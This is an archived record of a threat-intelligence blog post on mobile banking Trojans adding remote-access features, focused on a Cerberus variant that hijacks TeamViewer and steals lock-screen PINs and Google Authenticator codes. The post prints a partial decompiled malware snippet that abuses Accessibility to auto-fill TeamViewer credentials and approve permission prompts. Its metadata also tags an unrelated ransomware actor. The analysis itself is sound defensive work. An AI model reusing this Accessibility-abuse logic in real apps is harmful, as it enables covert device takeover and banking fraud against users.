{
	"id": "da27d497-9d19-443b-b86e-433199332fe2",
	"created_at": "2026-04-06T01:32:30.733127Z",
	"updated_at": "2026-04-10T03:30:32.832387Z",
	"deleted_at": null,
	"sha1_hash": "da0dee4f29a466f1dbdb916c85a05f326649b88a",
	"title": "2020 - Year of the RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 51463,
	"plain_text": "2020 - Year of the RAT\r\nPublished: 2024-10-01 · Archived: 2026-04-06 00:52:38 UTC\r\nIntro\r\nAccording to the Chinese zodiac, 2020 is the year of the RAT, and according to the myth the rat tricked its adversary in order to get ahead of it and “win the race”. The RAT mindset is also a growing trend that ThreatFabric analysts have observed in mobile banking Trojans over the last years. This blog provides an overview of the changes that took place in the mobile banking threat landscape over the last months and describes why we can expect an increase in the use of Remote Access Trojans for fraudulent purposes.\r\nPlay on words aside, in the world of malware the term RAT stands for Remote Access Trojan. This functionality can be added to malware in order to give the criminal operator the same degree of (remote) control over the infected device as its owner/user has.\r\nRemote access can be achieved in different ways, for example by using more-or-less native services such as SSH (Secure Shell) or RDP (Remote Desktop Protocol), or even by using third-party software such as TeamViewer, VNC or RAdmin. We want to stress that those tools by themselves are not inherently malicious and are in most cases used for legitimate purposes, such as providing users with support or performing remote administration (hence this type of utility is also called a Remote Administration Tool, which can cause confusion). Some malicious actors prefer to develop their own code/tools in the hope of remaining under the radar while benefiting from similar functionality.\r\nHistorically, mobile banking malware was designed and used primarily to access and steal information that facilitates financial fraud. Examples of such information include second factors of authentication (SMS, mTAN) and other secrets that could be used to perform fraud through the targeted banking services. 
As fraud detection mechanisms used by financial institutions evolved, it became harder for criminals to use the aforementioned methods without being detected.\r\nThreat actors have conceived diverse ways to circumvent detection mechanisms by impersonating the victim’s device. A famous one is the use of a back-connect proxy on the infected device combined with device fingerprints, allowing the actor’s device to look like the “real” one. Solutions like device binding and fingerprinting allowed financial institutions to detect such techniques, so criminals had to innovate again. In this situation RATs are the criminals’ Holy Grail, as they offer the ability to perform fraudulent transactions directly from the infected (victim) device. By doing so, criminals make it substantially harder to detect fraudulent transactions without a client-based detection solution.\r\nIn Android banking malware, the RAT capability has not been commonly used due to limitations of the Android operating system (it requires use of the Accessibility Service). Nevertheless, back in 2016 the “Retefe” threat actors were already observed making use of RAT functionality by abusing the TeamViewer application, giving them full control over the infected device. As Retefe is run by a group of experienced Windows malware actors, and because RAT capabilities are quite common in Windows banking malware, the actors probably decided to reuse that approach with Android devices as well.\r\nhttps://www.threatfabric.com/blogs/2020_year_of_the_rat.html\r\nPage 1 of 4\r\nThreat actors motivated by financial gain have noticed the shift of consumers from desktop towards mobile-based online banking. This trend has also resulted in the evolution of mobile malware in order to bypass detection measures. From simple SMS stealers to fully-fledged RATs with Automated Transaction Systems, criminals continuously innovate to try to remain successful. 
Hereafter is an overview of recent changes made by some key players in the Android banking malware threat landscape.\r\nCerberus\r\nThe Cerberus banking Trojan that appeared on the threat landscape at the end of June 2019 has taken over from the infamous Anubis Trojan as the major rented banking malware. While offering a feature set that enables successful exfiltration of personally identifiable information (PII) from infected devices, Cerberus was still lacking features that could help lower the detection barrier during the abuse of stolen information and fraud. In mid-January 2020, after the new-year celebrations, the Cerberus authors came back with a new variant that aimed to resolve that problem: a RAT feature to perform fraud from the infected device.\r\nThis new Cerberus variant has undergone refactoring of the code base and updates of the C2 communication protocol, but most notably it has been enhanced with the RAT capability, the possibility to steal device screen-lock credentials (PIN code or swipe pattern) and 2FA tokens from the Google Authenticator application.\r\nThe RAT service is able to traverse the file system of the device and download its contents. On top of that it can also launch TeamViewer and set up connections to it, providing threat actors with full remote access to the device. Once TeamViewer is working, it provides actors with many possibilities, including changing device settings, installing or removing apps, but most notably using any app on the device (such as banking apps, messengers and social network apps). 
It can also provide valuable insight into the victim’s behavior and habits, should it be used for espionage purposes.\r\nThe following snippet shows the code responsible for TeamViewer login and initialization:\r\nString runningPackage = this.lowerPkgName;\r\nif (getNodeFromEvent.contains(\"com.teamviewer.host.market\")) {\r\n    AccessibilityNodeInfo username = AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id/h\r\n    AccessibilityNodeInfo password = AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id/h\r\n    AccessibilityNodeInfo submit = AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id/hos\r\n    if (username != null) {\r\n        this.teamviewerUsername = this.utils.readShPrStr(this, this.strings.connect_teamviewer);\r\n        if (!this.teamviewerUsername.isEmpty()) {\r\n            this.teamviewerPassord = this.utils.readShPrStr(this, this.strings.password);\r\n            this.credsSubmitted = false;\r\n            this.passwordFilled = false;\r\n            this.userFilled = false;\r\n            this.permissionStatus = 0;\r\n            this.utils.writeShPrStr(this, this.strings.connect_teamviewer, \"\");\r\n            this.utils.writeShPrStr(this, this.strings.password, \"\");\r\n        }\r\n    }\r\n    if (this.permissionStatus == 0) {\r\n        AccessibilityNodeInfo v7_7 = AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id\r\n        if (v7_7 != null \u0026\u0026 AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id/buttonPane\r\n            this.permissionStatus = 1;\r\n            AccessibilityNodeInfo tmButton = AcccesibilityUtils.getNodeFromEvent(event, \"android:id/button1\");\r\n            if (tmButton != null) {\r\n                this.acc_utils.clickButton(tmButton);\r\n            }\r\n            AccessibilityNodeInfo klmCheckBox = AcccesibilityUtils.getNodeFromEvent(event, \"com.samsung.klmsagen\r\n            AccessibilityNodeInfo klmConfirm = AcccesibilityUtils.getNodeFromEvent(event, \"com.samsung.klmsagent\r\n            if (klmCheckBox != null 
\u0026\u0026 this.permissionStatus == 1) {\r\n                this.acc_utils.clickButton(klmCheckBox);\r\n                this.acc_utils.clickButton(klmConfirm);\r\n                this.permissionStatus = 2;\r\n                Utils utils = this.utils;\r\n                utils.launchPkg(this, \"com.teamviewer.host.market\");\r\n            }\r\n        }\r\n    }\r\n    if (!this.teamviewerUsername.isEmpty() \u0026\u0026 !this.teamviewerPassord.isEmpty()) {\r\n        if (username != null \u0026\u0026 !this.userFilled) {\r\n            this.acc_utils.setInput(username, this.teamviewerUsername);\r\n            this.userFilled = true;\r\n        }\r\n        if (password != null \u0026\u0026 !this.passwordFilled) {\r\n            this.acc_utils.setInput(password, this.teamviewerPassord);\r\n            this.passwordFilled = true;\r\n        }\r\n        if ((this.userFilled) \u0026\u0026 (this.passwordFilled) \u0026\u0026 !this.credsSubmitted) {\r\n            this.permissionStatus = 0;\r\n            this.acc_utils.clickButton(submit);\r\n            this.credsSubmitted = true;\r\n            String v0_9 = this.utils.readShPrStr(this, this.strings.hidden);\r\n            if (v0_9.equals(\"true\")) {\r\n                this.goBack();\r\n            }\r\n        }\r\n    }\r\n}\r\nThe feature enabling theft of the device’s screen-lock credentials (PIN and lock pattern) is powered by a simple overlay that requires the victim to unlock the device. From the implementation of the RAT we can conclude that this screen-lock credential theft was built so that the actors can remotely unlock the device in order to perform fraud when the victim is not using it. This once more shows the creativity of criminals in building the right tools to be successful.\r\nAbusing the Accessibility privileges, the Trojan can now also steal 2FA codes from the Google Authenticator application. When the app is running, the Trojan can get the content of the interface and send it to the C2 server. 
Once again, we can deduce that this functionality will be used to bypass authentication services that rely on OTP codes.\r\nThis is an example of what the Google Authenticator application looks like:\r\nSource: https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.threatfabric.com/blogs/2020_year_of_the_rat.html"
	],
	"report_names": [
		"2020_year_of_the_rat.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439150,
	"ts_updated_at": 1775791832,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/da0dee4f29a466f1dbdb916c85a05f326649b88a.pdf",
		"text": "https://archive.orkl.eu/da0dee4f29a466f1dbdb916c85a05f326649b88a.txt",
		"img": "https://archive.orkl.eu/da0dee4f29a466f1dbdb916c85a05f326649b88a.jpg"
	}
}